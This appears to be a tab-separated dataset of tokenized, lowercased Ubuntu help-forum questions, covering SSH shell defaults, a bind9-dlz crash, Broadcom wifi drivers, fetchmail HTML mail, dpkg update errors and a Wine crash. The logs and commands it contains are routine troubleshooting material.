500817	when i ssh to an ubuntu machine , why is my shell /bin/sh and not /bin/bash ?	i 'm not exactly sure what is going on with these 2 machines i 'm working on . i 've inserted my debug log . maybe somebody knows what 's going on based on this output . as far as i know i did n't do anything special to cause this and i 've been deploying a bunch of machines , seemingly exactly the same , this is one of two that are the only ones doing this openssh_6.6.1 , openssl 1.0.1f 6 jan 2014 debug1 : reading configuration data /home/username/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 192.168.100.180 [ 192.168.100.180 ] port 22. debug1 : connection established . debug1 : identity file /home/username/.ssh/id_rsa type -1 debug1 : identity file /home/username/.ssh/id_rsa-cert type -1 debug1 : identity file /home/username/.ssh/id_dsa type -1 debug1 : identity file /home/username/.ssh/id_dsa-cert type -1 debug1 : identity file /home/username/.ssh/id_ecdsa type -1 debug1 : identity file /home/username/.ssh/id_ecdsa-cert type -1 debug1 : identity file /home/username/.ssh/id_ed25519 type -1 debug1 : identity file /home/username/.ssh/id_ed25519-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.6.1p1 ubuntu-2ubuntu2 debug1 : remote protocol version 2.0 , remote software version openssh_6.6.1p1 ubuntu-2ubuntu2 debug1 : match : openssh_6.6.1p1 ubuntu-2ubuntu2 pat openssh_6.6.1* compat 0x04000000 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 192.168.100.180 '' from file `` /home/username/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/username/.ssh/known_hosts:11 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : curve25519-sha256 @ libssh.org , ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-ed25519-cert-v01 @ openssh.com , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-ed25519 , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , chacha20-poly1305 @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , chacha20-poly1305 @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : curve25519-sha256 @ libssh.org , ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 , ssh-ed25519 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , chacha20-poly1305 @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , chacha20-poly1305 @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : setup hmac-md5-etm @ openssh.com debug1 : kex : server- > client aes128-ctr hmac-md5-etm @ openssh.com none debug2 : mac_setup : setup hmac-md5-etm @ openssh.com debug1 : kex : client- > server aes128-ctr hmac-md5-etm @ openssh.com none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa < hidden > debug3 : load_hostkeys : loading entries for host `` 192.168.100.180 '' from file `` /home/username/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/username/.ssh/known_hosts:11 debug3 : load_hostkeys : loaded 1 keys debug1 : host '192.168.100.180 ' is known and matches the ecdsa host key . debug1 : found key in /home/username/.ssh/known_hosts:11 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/username/.ssh/id_rsa ( ( nil ) ) , debug2 : key : /home/username/.ssh/id_dsa ( ( nil ) ) , debug2 : key : /home/username/.ssh/id_ecdsa ( ( nil ) ) , debug2 : key : /home/username/.ssh/id_ed25519 ( ( nil ) ) , debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : trying private key : /home/username/.ssh/id_rsa debug3 : no such identity : /home/username/.ssh/id_rsa : no such file or directory debug1 : trying private key : /home/username/.ssh/id_dsa debug3 : no such identity : /home/username/.ssh/id_dsa : no such file or directory debug1 : trying private key : /home/username/.ssh/id_ecdsa debug3 : no such identity : /home/username/.ssh/id_ecdsa : no such file or directory debug1 : trying private key : /home/username/.ssh/id_ed25519 debug3 : no such identity : /home/username/.ssh/id_ed25519 : no such file or directory debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password username @ 192.168.100.180 's password : debug3 : packet_send2 : adding 64 ( len 58 padlen 6 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentication succeeded ( password ) . authenticated to 192.168.100.180 ( [ 192.168.100.180 ] :22 ) . debug1 : channel 0 : new [ client-session ] debug3 : ssh_session2_open : channel_new : 0 debug2 : channel 0 : send open debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug2 : callback start debug2 : fd 3 setting tcp_nodelay debug3 : packet_set_tos : set ip_tos 0x10 debug2 : client_session2_setup : id 0 debug2 : channel 0 : request pty-req confirm 1 debug1 : sending environment . debug3 : ignored env xdg_vtnr debug3 : ignored env ssh_agent_pid debug3 : ignored env xdg_session_id debug3 : ignored env clutter_im_module debug3 : ignored env selinux_init debug3 : ignored env gio_launched_desktop_file_pid debug3 : ignored env session debug3 : ignored env gpg_agent_info debug3 : ignored env term debug3 : ignored env shell debug3 : ignored env xdg_menu_prefix debug3 : ignored env ssh_agent_launcher debug3 : ignored env derby_home debug3 : ignored env upstart_session debug3 : ignored env gnome_keyring_control debug3 : ignored env user debug3 : ignored env ls_colors debug3 : ignored env desktop_autostart_id debug3 : ignored env ssh_auth_sock debug3 : ignored env session_manager debug3 : ignored env username debug3 : ignored env defaults_path debug3 : ignored env gio_launched_desktop_file debug3 : ignored env xdg_config_dirs debug3 : ignored env path debug3 : ignored env desktop_session debug3 : ignored env qt_im_module debug3 : ignored env job debug3 : ignored env pwd debug3 : ignored env xmodifiers debug3 : ignored env java_home debug3 : ignored env gnome_keyring_pid debug1 : sending env lang = en_us.utf-8 debug2 : channel 0 : request env confirm 0 debug3 : ignored env gdm_lang debug3 : ignored env mandatory_path debug3 : ignored env im_config_phase debug3 : ignored env gdmsession debug3 : ignored env sessiontype debug3 : ignored env shlvl debug3 : ignored env xdg_seat debug3 : ignored env home debug3 : ignored env gnome_desktop_session_id debug3 : ignored env logname debug3 : ignored env qt4_im_module debug3 : ignored env xdg_data_dirs debug3 : ignored env dbus_session_bus_address debug3 : ignored env j2sdkdir debug3 : ignored env instance debug3 : ignored env textdomain debug3 : ignored env windowpath debug3 : ignored env xdg_runtime_dir debug3 : ignored env display debug3 : ignored env xdg_current_desktop debug3 : ignored env gtk_im_module debug3 : ignored env j2redir debug3 : ignored env textdomaindir debug3 : ignored env xauthority debug3 : ignored env oldpwd debug3 : ignored env _ debug2 : channel 0 : request shell confirm 1 debug2 : callback done debug2 : channel 0 : open confirm rwindow 0 rmax 32768 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : pty allocation request accepted on channel 0 debug2 : channel 0 : rcvd adjust 2097152 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : shell request accepted on channel 0 welcome to ubuntu 14.04 lts ( gnu/linux 3.13.0-32-generic x86_64 ) * documentation : https : //help.ubuntu.com/ last login : mon jul 21 16:30:56 2014 from 172.25.1.130 $ $ $ $ exit debug1 : client_input_channel_req : channel 0 rtype exit-status reply 0 debug1 : client_input_channel_req : channel 0 rtype eow @ openssh.com reply 0 debug2 : channel 0 : rcvd eow debug2 : channel 0 : close_read debug2 : channel 0 : input open - > closed debug2 : channel 0 : rcvd eof debug2 : channel 0 : output open - > drain debug2 : channel 0 : obuf empty debug2 : channel 0 : close_write debug2 : channel 0 : output drain - > closed debug2 : channel 0 : rcvd close debug3 : channel 0 : will not send data after close debug2 : channel 0 : almost dead debug2 : channel 0 : gc : notify user debug2 : channel 0 : gc : user detached debug2 : channel 0 : send close debug2 : channel 0 : is dead debug2 : channel 0 : garbage collecting debug1 : channel 0 : free : client-session , nchannels 1 debug3 : channel 0 : status : the following connections are open : # 0 client-session ( t4 r0 i3/0 o3/0 fd -1/-1 cc -1 ) connection to 192.168.100.180 closed . transferred : sent 2984 , received 2660 bytes , in 3.8 seconds bytes per second : sent 790.5 , received 704.7 debug1 : exit status 0
500818	compiled bind9-dlz and error : corrupted double-linked list	i have fresh installation of ubuntu server 14.04 and i 've compiled bind9 with dlz drivers . compilation went ok , packages were created . after installation and configuration based on this post : http : //ubuntuforums.org/showthread.php ? t=1867237 when i try dig @ 127.0.0.1 my-domain.com bind9 crashes with query string : select zone from bind9_dlz.dns_records where zone = 'my-dmain.com' 21-jul-2014 11:46:58.515 query string : select ttl , type , mx_priority , case when lower ( type ) ='txt ' then ' '' ' || data ' '' ' else data end as data from bind9_dlz.dns_records where zone = 'my-domain.com ' and host = ' @ ' and type < > 'soa ' and type < > 'ns' *** error in `/usr/sbin/named ' : corrupted double-linked list : 0x00007fb43c0009b0 *** aborted ( core dumped ) ... fail ! steps i took to build bind9-dlz : apt-get update apt-get install bind9 bind9-doc bind9-host bind9utils apt-get build-dep bind9 apt-get source bind9 apt-get install devscripts cd bind9-9.9.5.dfsg vim debian/rules added this to configure line -- with-dlz-postgres=yes \ -- with-dlz-mysql=yes \ -- with-dlz-bdb=no \ -- with-dlz-filesystem=yes \ -- with-dlz-ldap=yes \ -- with-dlz-stub=yes \ and then run debiuld and after the successful compilation i 've installed them with dpkg -i bind9_9.9.5.dfsg-3_amd64.deb bind9-doc_9.9.5.dfsg-3_all.deb bind9-host_9.9.5.dfsg-3_amd64.deb bind9utils_9.9.5.dfsg-3_amd64.deb update same steps taken on debian 7.6 amd64 works fine , when querying bind9 does not crash . so is it an ubuntu issue ?
500819	wireless bcm4318 not working	edit : i researched also link suggested above - it is option ( 3 ) and indeed is very helpful . especially @ luisalvarado 's answer - it contains table which suggest using linux-firmware-nonfree - i tried and it did not worked ( possibly because my system was polluted by remnants of previous attempts ) . instead , b43-fwcutter from option ( 2 ) after clean reinstall worked for me . linked answer contains good explanation of the process , but advice about exact module to use might be incorrect . wileress.kernel.org has different value value , which worked for me . original post : i can not get bcm4318 working on lubuntu 14.4 . this card worked on lubuntu 12.10 but upgrading failed , and after full reinstall from liveusb i can not get wifi to work . i tried these suggestions : ( 1 ) advice for 12.4 suggests to apt-get -- reinstall install bcmwl-kernel-source ( 2 ) this says : apt-get purge bcmwl-kernel-sourceinstead , says : apt-get install b43-fwcutter firmware-b43-installer but did not work either . ( 3 ) this suggests apt-get install linux-firmware-nonfree - well worth reading , excellent explanation of problem . every time i purged packages from previous try and rebooted afterwards . ( 4 ) this also suggest blacklisting some entries . it seems that b43 from ( 2 ) should work ( bcm43xx entry is blacklisted ) . but no luck . ( 5 ) downgrading is also suggested by this year-old answer but i was hoping there is something newer/better . the author claims that every release makes bcm43xx harder . what else i should try ? i checked `` ultimate authority '' on bcm43xx wireless , http : //wireless.kernel.org/en/users/drivers/b43 # supported_devices which says ( in debian section ) to use option ( 2 ) , but no luck . by `` no luck '' i mean that iwconfig says no wireless connection . in my office i have wired connection to modem but no apparent wireless . is iwconfig a right way to test if my wireless is alive ? lsmod | grep -e b43 -e wl : b43 356470 0 bcma 42043 1 b43 mac80211 545990 1 b43 cfg80211 409394 2 b43 , mac80211 ssb 51854 2 b43 , b44 lspci -nn | grep 0280 06:02.0 network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 ) uname -mr 3.13.0-24-generic i686 my laptop is acer aspire 5610z with 0.5gb of ram which i am going to upgrade to 4gb asap . i got it working . correct answer is option ( 2 ) , at least for my combinations of whatever is relevant . what probably caused my earlier problems was that i was installing using synaptic gui . when i did install using terminal and apt-get , i noticed that apt-get update complained about duplicate sources . once resolved , i again went over whole installing exercise , including fresh reinstall ( to make sure there are no remnants of other installs ) , and straight to option ( 2 ) as suggested by wireless.kernel.org . regarding other options , it is above my paygrade to decide if they are invalid and need to be updated , or can stay as is , if approaches suggested by ( 1 ) and ( 3 ) are correct and may work for someone else .
500820	fetchmail : html version of mail	i am trying to read mail from a pop3 server and print it through cups . i want to keep the html formatting of the email as it was received and that is where i am having trouble on seeing header of every formatted email on the web client , i can see it has two versions in one email . one is text/plain version , without formatting . other is text/html version which contains the html code of the formatted email . i am using fetchmail to retrieve the email and then mailx to read is . my problem is that i can only see the text/plain version . the html version is not available . i have a doubt that fetchmail is somehow truncating the html version . my question consists of two parts : 1 ) how can i make fetchmail bring whole email i.e . with text/html part so that the original email can be generated 2 ) how can i print that email in html format ( without html code , only output ) to on the paper . i am using raspbian with fetchmail , mailx and cups for the above mentioned tasks i have tried mutt to read the email as well but with same results . so the problem is somewhere in fetching or forwarding it to the local user mailbox edit : upon using cat /var/mail/username | grep html , i can see the emails do contain html versions . so the error is not with fetchmail . there is some thing i am missing with mailx or mutt , that is not displaying html version
500821	gnome-terminal vim gruvbox	just installed gruvbox color scheme for vim on ubuntu , but the color scheme is not fully supported in the terminal . it works fine on a fedora box . do i need any additional settings ?
500822	linux updates failing	i 'm fairly new to ubuntu , i 'm running ubuntu 14.04 lts 64bit . i 've been having a problem with my apps updating , i keep getting the error when i try to update from the appstore which it is prompting , that does n't work so i try the reapir option which comes up with 'package operation failed ' bellow is the details scrip from the error message : installarchives ( ) failed : ( reading database ... dpkg : warning : files list file for package 'gnome-power-manager ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-color-manager ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-control-center-shared-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-session-bin ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-shell-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-packagekit-session ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-shell ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-applets ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-tetravex ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-klotski ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-screensaver ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-desktop3-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-panel-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-user-share ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-online-accounts ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-mahjongg ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-applets-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-icon-theme-extras ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-documents ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-terminal-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-tweak-tool ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-disk-utility ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-settings-daemon-schemas ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-shell-extensions ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-themes-standard-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-bluetooth ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-orca ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-online-miners ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-icon-theme-full ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-session ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-sushi ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-nibbles ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-icon-theme ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-packagekit ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-calculator ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-control-center ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-media ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-backgrounds ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-session-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-menus ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-session-canberra ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-games ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-font-viewer ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-sudoku ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-dictionary ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-mines ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-keyring ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-nettool ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-control-center-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-session-flashback ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-accessibility-themes ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-contacts ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-panel ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-icon-theme-symbolic ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-packagekit-data ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-system-log ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-core ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-chess ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-themes-standard : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-settings-daemon ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-system-monitor ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-user-guide ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-terminal ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-video-effects ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-robots ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'gnome-screenshot ' missing ; assuming package has no files currently installed ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 199694 files and directories currently installed . ) preparing to unpack ... /libreoffice-common_1 % 3a4.2.4-0ubuntu2_all.deb ... unpacking libreoffice-common ( 1:4.2.4-0ubuntu2 ) ... dpkg : error processing archive /var/cache/apt/archives/libreoffice-common_1 % 3a4.2.4-0ubuntu2_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice-debian-menus 4.1-9764 rmdir : failed to remove /var/lib/libreoffice/share/prereg/ : no such file or directory rmdir : failed to remove /var/lib/libreoffice/share/ : no such file or directory rmdir : failed to remove /var/lib/libreoffice/program/ : no such file or directory rmdir : failed to remove /var/lib/libreoffice : no such file or directory rmdir : failed to remove /var/lib/libreoffice : no such file or directory processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for gnome-icon-theme ( 3.10.0-0ubuntu2 ) ... processing triggers for shared-mime-info ( 1.2-0ubuntu3 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.2.4-0ubuntu2_all.deb error in function : dpkg : dependency problems prevent configuration of libreoffice-l10n-en-gb : libreoffice-l10n-en-gb depends on libreoffice-common ; however : package libreoffice-common is not installed . dpkg : error processing package libreoffice-l10n-en-gb ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-l10n-en-za : libreoffice-l10n-en-za depends on libreoffice-common ; however : package libreoffice-common is not installed . dpkg : error processing package libreoffice-l10n-en-za ( -- configure ) : dependency problems - leaving unconfigured any help with this would be brilliant , i uninstalled libreoffice from the pc .
500825	set pcmanfm default folder view	in upmenu i can only preserve view for folders . i can press ctrl+4 , but whats the way to change the default view permanent ? ( lubuntu 14.04 , pcmanfm 1.2.0 )
500826	wine 1.6.2 on latest ubuntu gives this error	when i am trying to run a windows application on the latest ubuntu , the wine quits and gives this error : unhandled exception : illegal instruction in 32-bit code ( 0x005832d8 ) . register dump : cs:0073 ss:007b ds:007b es:007b fs:0033 gs:003b eip:005832d8 esp:0033fe0c ebp:0033fe20 eflags:00010206 ( r- -- i - -p- ) eax:00846f90 ebx:00000000 ecx:00849190 edx:00000000 esi:0084b198 edi:0084b284 stack dump : 0x0033fe0c : 0098e748 00846f95 0055aea9 00ee0785 0x0033fe1c : 0000000a 0033fe60 00d6c8a6 00000001 0x0033fe2c : 4ecd4807 00ee0785 7ffdf000 7b8b5000 0x0033fe3c : 79e50414 c000001d 00000000 0033fe2c 0x0033fe4c : 0033f970 0033fef0 0055fa80 4e6e7a17 0x0033fe5c : 00000000 0033fe78 7b85e5cc 7ffdf000 backtrace : = > 0 0x005832d8 in terminal ( +0x1832d8 ) ( 0x0033fe20 ) 1 0x00d6c8a6 in terminal ( +0x96c8a5 ) ( 0x0033fe60 ) 2 0x7b85e5cc call_process_entry+0xb ( ) in kernel32 ( 0x0033fe78 ) 3 0x7b85f653 in kernel32 ( +0x4f652 ) ( 0x0033feb8 ) 4 0x7bc799b0 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0033fed8 ) 5 0x7bc7c93d call_thread_func+0x7c ( ) in ntdll ( 0x0033ffa8 ) 6 0x7bc7998e rtlraiseexception+0x21 ( ) in ntdll ( 0x0033ffc8 ) 7 0x7bc4e8fe call_dll_entry_point+0x7ed ( ) in ntdll ( 0x0033ffe8 ) 8 0xb762550d wine_call_on_stack+0x1c ( ) in libwine.so.1 ( 0x00000000 ) 9 0xb76255cb wine_switch_to_stack+0x2a ( ) in libwine.so.1 ( 0xbfb9ccb8 ) 10 0x7bc541e2 ldrinitializethunk+0x3a1 ( ) in ntdll ( 0xbfb9cd18 ) 11 0x7b865bdd __wine_kernel_init+0xa0c ( ) in kernel32 ( 0xbfb9de38 ) 12 0x7bc547a3 __wine_process_init+0x192 ( ) in ntdll ( 0xbfb9dec8 ) 13 0xb7622c70 wine_init+0x30f ( ) in libwine.so.1 ( 0xbfb9df28 ) 14 0x7bf00fdc main+0xfb ( ) in < wine-loader > ( 0xbfb9e378 ) 15 0xb7451a83 __libc_start_main+0xf2 ( ) in libc.so.6 ( 0x00000000 ) 0x005832d8 : ( bad ) modules :
500827	software updater constantly green	using ubuntu 14.04 software updater , when there are updates the icon turns green , i do all the installs that it recognises and ocasionaly i restart the computer as per request . problem occurs that the icon stays coloured green and does not fade , when clicked it tells me computer is up to date , yet icon is still green . ive tried to carry out the following in terminal with no success and no errors in the terminal . sudo apt-get update sudo apt-get upgrade
